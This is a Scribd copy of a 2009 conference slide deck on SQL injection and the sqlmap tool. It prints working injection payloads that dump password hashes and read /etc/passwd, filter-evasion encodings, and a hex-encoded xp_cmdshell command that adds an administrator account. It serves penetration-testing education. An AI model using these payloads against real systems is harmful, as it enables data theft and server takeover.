Scribd
Upload
211 views

SQL Injection: Not Only AND 1 1: Bernardo Damele Assumpção Guimarães

This document discusses SQL injection vulnerabilities and techniques for exploiting them. It introduces sqlmap, an open source tool for detecting and exploiting SQL injection flaws. Key points include: - SQL injection occurs when user input is unsanitized and inserted into SQL queries, allowing injection of malicious SQL commands. - sqlmap can detect SQL injection vulnerabilities, fingerprint database management systems, dump database contents like users and passwords, and execute arbitrary commands on the backend system. - Various techniques are discussed for exploiting SQL injection flaws, including boolean-based blind, UNION query, and batched queries. Bypasses for limitations like number of columns are also covered.

Uploaded by

ki_soewarsono
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
211 views

SQL Injection: Not Only AND 1 1: Bernardo Damele Assumpção Guimarães

This document discusses SQL injection vulnerabilities and techniques for exploiting them. It introduces sqlmap, an open source tool for detecting and exploiting SQL injection flaws. Key points include: - SQL injection occurs when user input is unsanitized and inserted into SQL queries, allowing injection of malicious SQL commands. - sqlmap can detect SQL injection vulnerabilities, fingerprint database management systems, dump database contents like users and passwords, and execute arbitrary commands on the backend system. - Various techniques are discussed for exploiting SQL injection flaws, including boolean-based blind, UNION query, and batched queries. Bypasses for limitations like number of columns are also covered.

Uploaded by

ki_soewarsono
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 41

SQL injection: Not Only AND 1=1

Bernardo Damele Assumpção Guimarães


Who I am

Bernardo Damele Assumpção Guimarães

Proud father

Penetration tester / security researcher


Portcullis Computer Security Ltd

Open source projects


sqlmap lead developer
MySQL UDF repository developer
Metasploit contributor
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 2
SQL injection definition

 SQL injection attacks are a type of injection attack, in


which SQL commands are injected into data-plane input
in order to affect the execution of predefined SQL
statements

 It is a common threat in web applications that lack of


proper sanitization on user-supplied input used in SQL
queries

 It does not affect only web applications!

 A long list of resources can be found on my delicious


profile, http://delicious.com/inquis/sqlinjection

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 3


How does it work?

Detection of a possible SQL injection flaw

Back-end database management system


fingerprint

SQL injection vulnerability can lead to:


DBMS data exfiltration and manipulation
File system read and write access
Operating system control

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 4


sqlmap – http://sqlmap.sourceforge.net

Open source command-line automatic tool

Detect and exploit SQL injection flaws in web


applications

Developed in Python since July 2006

Released under GPLv2

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 5


sqlmap key features

 Full support for MySQL, Oracle, PostgreSQL and


Microsoft SQL Server

 Three SQL injection techniques:


Boolean-based blind
UNION query
Batched (stacked) queries

 Perform an extensive back-end DBMS fingerprint

 Enumerate users, password hashes, privileges,


databases, tables, columns and their data-type

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 6


sqlmap key features

 Dump entire or user specified database table entries

 Run own SQL statements

 Read either text or binary files from the file system

 Execute arbitrary commands on the operating system

 Establish an out-of-band stateful connection between


the attacker box and the database server

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 7


Database management system fingerprint

sqlmap implements up to four techniques:

Inband error messages

Banner (version(), @@version, …) parsing

SQL dialect

Specific functions static output comparison

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 8


Database management system fingerprint

Example of basic back-end DBMS fingerprint on


Oracle 10g Express Edition:

Two techniques:
 Specific variables
 Specific functions static output comparison

The two possible queries to fingerprint it are:


AND ROWNUM=ROWNUM
AND LENGTH(SYSDATE)=LENGTH(SYSDATE)

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 9


Database management system fingerprint

Example of extensive back-end DBMS fingerprint


on Microsoft SQL Server 2005:

Three techniques:

 Active fingerprint: Microsoft SQL Server 2005


 Banner parsing fingerprint: Microsoft SQL Server 2005
Service Pack 0 version 9.00.1399
 HTML error message fingerprint: Microsoft SQL Server

Active fingerprint refers to specific functions’ static


output comparison in this example

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 10


Database management system fingerprint

Examples of SQL dialect fingerprint:

On MySQL:

/*!50067 AND 47=47 */

On PostgreSQL:

AND 82::int=82

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 11


More on fingerprint

Fingerprinting is a key step in penetration


testing
It is not only about back-end DBMS software

There are techniques and tools to fingerprint the


web server, the web application technology and
their underlying system

What about the back-end DBMS underlying


operating system?
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 12
More on fingerprint

sqlmap can fingerprint them without making


extra requests:

Web/application server and web application


technology: by parsing the HTTP response
headers
 Known basic technique

Back-end DBMS operating system: by parsing the


DBMS banner
 Over-looked technique
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 13
SQL statement syntax

Identify the web application query syntax is


mandatory

It is needed to correctly exploit the flaw

Example:

"SELECT id, user FROM users WHERE id LIKE


((('%" . $_GET['id'] . "%'))) LIMIT 0, 1"

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 14


SQL statement syntax

Possible exploitation vector:

page.php?id=1'))) AND ((('RaNd' LIKE 'RaNd

For a boolean-based blind SQL injection exploit:

1'))) AND ORD(MID((SQL query),


Nth SQL query output character, 1)) >
Bisection algorithm number
AND ((('RaNd' LIKE 'RaNd

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 15


SQL statement syntax

For a UNION query SQL injection exploit:

1'))) UNION ALL SELECT NULL,


Concatenated SQL query#
AND ((('RaNd' LIKE 'RaNd

For a batched query SQL injection exploit:

1'))); SQL query;#


AND ((('RaNd' LIKE 'RaNd

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 16


Bypass number of columns limitation

You’ve got a SQL injection point vulnerable to


UNION query technique detected by:

ORDER BY clause brute-forcing


NULL brute-forcing
Sequential number brute-forcing

The number of columns in the SELECT


statement is fewer than the number of columns
that you want to inject
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 17
Bypass number of columns limitation

Concatenate your SELECT statement columns


with random delimiters in a single output

Example:
The original SELECT statement has only one
column
SELECT col FROM tbl WHERE id=1

Back-end DBMS is PostgreSQL 8.3

We want to retrieve users’ password hashes


2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 18
Bypass number of columns limitation

SELECT usename, passwd FROM pg_shadow


UNION ALL SELECT,
CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR
(68)||CHR(111)||COALESCE(CAST(usename AS
CHARACTER(10000)),
CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(
121)||CHR(66)||CHR(109)||COALESCE(CAST(pas
swd AS CHARACTER(10000)),
CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR
(103)||CHR(107)||CHR(90), FROM pg_shadow--

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 19


Single entry UNION query SQL injection

You’ve got a parameter vulnerable to UNION


query SQL injection

The page displays only the query’s first entry


output

Change the parameter value to its negative


value or append a false AND condition to the
original parameter value
Cause the original query to produce no output
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 20
Single entry UNION query SQL injection

Inspect and unpack the SQL injection statement:

Calculate its output number of entries

Limit it to return one entry at a time

Repeat the previous action N times where N


is the number of output entries

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 21


Single entry UNION query SQL injection

Example on MySQL 4.1 to enumerate the list of


databases:

SELECT db FROM mysql.db


SELECT … WHERE id=1 AND 3=2 UNION ALL SELECT
CONCAT(CHAR(100,84,71,69,87,98),IFNULL(CAST(db
AS CHAR(10000)), CHAR(32)),
CHAR(65,83,118,81,87,116)) FROM mysql.db LIMIT
Nth, 1# AND 6972=6972

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 22


Single entry UNION query SQL injection

Another technique consists of retrieving


entries as a single string

Example on MySQL 5.0:


SELECT user, password FROM mysql.user


SELECT GROUP_CONCAT(CONCAT(user, 'RaND',
password)) FROM mysql.user
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 23
Getting a SQL shell

sqlmap has options to enumerate / dump


different types of data from the back-end DBMS

It also allows the user to run custom SQL


queries

It inspects the provided statement:


SELECT: it goes blind or UNION query to retrieve
the output
DDL, DML, etc: it goes batched query to run it
2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 24
SQL injection: Not only WHERE clause

Most of the SQL injections occur within the


WHERE clause, but GROUP BY, ORDER BY and
LIMIT can also be affected

SQL injection within these clauses can be


exploited to perform a blind injection or, in some
cases, a UNION query injection

In all cases batched query injection is possible

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 25


SQL injection in GROUP BY clause

Example on MySQL 5.0:

"SELECT id, name FROM users GROUP BY "


. $_GET['id']


SELECT id, name FROM users GROUP BY 1,
(SELECT (CASE WHEN (condition) THEN 1 ELSE
1*(SELECT table_name FROM
information_schema.tables) END))

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 26


SQL injection in ORDER BY clause

Example on PostgreSQL 8.2:

"SELECT id, name FROM users ORDER BY "


. $_GET['id']


SELECT id, name FROM users ORDER BY 1,
(SELECT (CASE WHEN (condition) THEN 1 ELSE
1/0 END))

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 27


SQL injection in LIMIT clause

Example on MySQL 6.0:

"SELECT id, name FROM users LIMIT 0, "


. $_GET['id']


SELECT id, name FROM users LIMIT 0, 1
UNION ALL SELECT (CASE WHEN (condition)
THEN 1 ELSE 1*(SELECT table_name FROM
information_schema.tables) END), NULL

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 28


SQL injection payloads to bypass filters

There are numerous techniques to bypass:

Web application language security settings

Web application firewalls

Intrusion [Detection|Prevention] Systems

Web server security settings

These techniques can be combined


2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 29
PHP Magic Quotes misuse: Bypass

You’ve a SQL injection point in a GET, POST


parameter or Cookie value

Web application language is PHP


magic_quotes_gpc setting is On or
addslashes() is used within the source code

Back-end DBMS is either Microsoft SQL Server or


Oracle
Their escaping character for single quote is single
quote

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 30


PHP Magic Quotes misuse: Bypass

 Original statement:
"SELECT name, surname FROM users WHERE
name='" . $_GET['name'] . "'"

 Example of a successful exploit:


foobar' OR 10>4--

 Query passed by PHP to the back-end DBMS:


SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 31


PHP Magic Quotes misuse: Bypass

For a UNION query SQL injection exploit:


SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'

For a boolean-based blind SQL injection exploit:


SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 32


PHP Magic Quotes bypass: Avoid single quotes

 Example on MySQL:
LOAD_FILE('/etc/passwd')


LOAD_FILE(CHAR(47,101,116,99,47,112,97,
115,115,119,100))
or
LOAD_FILE(0x2f6574632f706173737764)

 It is not limited to bypass only PHP Magic Quotes

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 33


Bypass with percentage char on ASP

ASP ignores % if not followed by a valid pair of


characters

Example on ASP with back-end DBMS


PostgreSQL:

SELECT pg_sleep(3)


S%ELEC%T %p%g_sle%ep(%3)

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 34


Bypass by hex-encoding the SQL statement

 Example on Microsoft SQL Server:


exec master..xp_cmdshell 'NET USER myuser
mypass /ADD & NET LOCALGROUP
Administrators myuser /ADD'


DECLARE @rand varchar(8000) SET @rand =
0x65786563206d61737465722e2e78705f636d6473
68656c6c20274e45542055534552206d7975736572
206d7970617373202f4144442026204e4554204c4f
43414c47524f55502041646d696e6973747261746f
7273206d7975736572202f41444427; EXEC
(@rand)

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 35


Bypass by comments as separators

Example on MySQL:

SELECT user, password FROM mysql.user


SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D
*/password/*r+anD*/FROM/*rAn,D*/mysq
l.user

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 36


Bypass by random mixed case payload

Example on Oracle 10g:

SELECT banner FROM v$version WHERE


ROWNUM=1


SeLEcT BaNneR FroM v$vERsIon WhERe
ROwNUm=1

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 37


Bypass by random URI encoded payload

Example on PostgreSQL:

SELECT schemaname FROM pg_tables


%53E%4c%45%43T%20%73%63h%65%6d%61%6e
a%6de%20%46%52O%4d%20%70g%5f%74a%62%
6ce%73

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 38


SQL injection to operating system full control

We’ve seen how to detect and exploit different


SQL injection flaws, retrieve and manipulate
data on the DBMS and bypass web application
filters… what else?

Check my recent research about compromising


the underlying file system and the operating
system via SQL injection on
http://tinyurl.com/sqlmap1

2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 39


Credits

Chip Andrews, www.sqlsecurity.com

Alberto Revelli, sqlninja.sourceforge.net

Sumit Siddharth, www.notsosecure.com

Alessandro Tanasi, lab.lonerunners.net

Ralf Braga, www.linkedin.com/in/ralfbraga


2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 40
Questions?

Bernardo Damele Assumpção Guimarães


[email protected]
http://bernardodamele.blogspot.com
http://sqlmap.sourceforge.net

Thanks for your attention!


2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 41

You might also like